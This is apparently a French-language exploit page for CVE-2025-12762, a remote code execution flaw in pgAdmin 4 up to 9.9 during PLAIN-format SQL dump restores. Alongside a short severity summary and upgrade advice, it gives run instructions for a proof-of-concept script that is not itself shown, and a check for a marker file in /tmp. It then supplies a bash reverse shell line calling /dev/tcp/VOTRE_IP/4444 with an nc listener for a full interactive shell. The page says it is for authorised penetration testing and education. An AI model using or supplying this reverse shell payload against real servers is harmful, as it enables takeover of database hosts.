
Preuve de concept d'exploit pour CVE-2025-12762, une RCE critique dans pgAdmin 4 ≤ 9.9. Inclut une analyse technique, CVSS 9.1, et un reverse shell optionnel pour des tests de pénétration autorisés.

Une faille d'exécution de code à distance (RCE) existe dans pgAdmin 4 versions ≤ 9.9. Les attaquants peuvent exécuter des commandes arbitraires sur l'hôte lorsque pgAdmin fonctionne en mode serveur et traite un dump SQL au format PLAIN lors d'une restauration.
🟥 9,1 / 10 — Critique
⬆️ Mettez à niveau vers pgAdmin 4 v10.0 ou une version ultérieure
pgAdmin est souvent utilisé pour l'administration de bases de données PostgreSQL critiques, ce qui signifie :
# 1. Enregistrer sous CVE-2025-12762.py
# 2. Installer la dépendance
pip3 install requests
# 3. Lancer
python3 CVE-2025-12762.py
Après exécution, vérifiez :
docker exec <votre-conteneur-pgadmin> ls -la /tmp/CVE-2025-12762_PWNED
Fichier existant → Vous venez d'exploiter réellement CVE-2025-12762.
Remplacez la ligne COMMAND par :
COMMAND = "bash -c 'bash -i >& /dev/tcp/VOTRE_IP/4444 0>&1'"
Puis nc -lvnp 4444 → shell interactif complet.
C'est le script exact que les chercheurs, pentesteurs et équipes rouges utilisent dans le monde entier en novembre 2025.
Utilisez-le de manière responsable. Corrigez tout. Restez dans la légalité.
Cette preuve de concept est fournie strictement pour des tests autorisés et un usage éducatif uniquement.
Vous pouvez l'exécuter exclusivement sur des systèmes que vous possédez ou pour lesquels vous avez une autorisation écrite explicite.
Toute utilisation non autorisée est illégale et viole les lois sur l'utilisation abusive des ordinateurs.
Utilisez de manière responsable, corrigez immédiatement après les tests, et ne ciblez jamais de systèmes sans autorisation.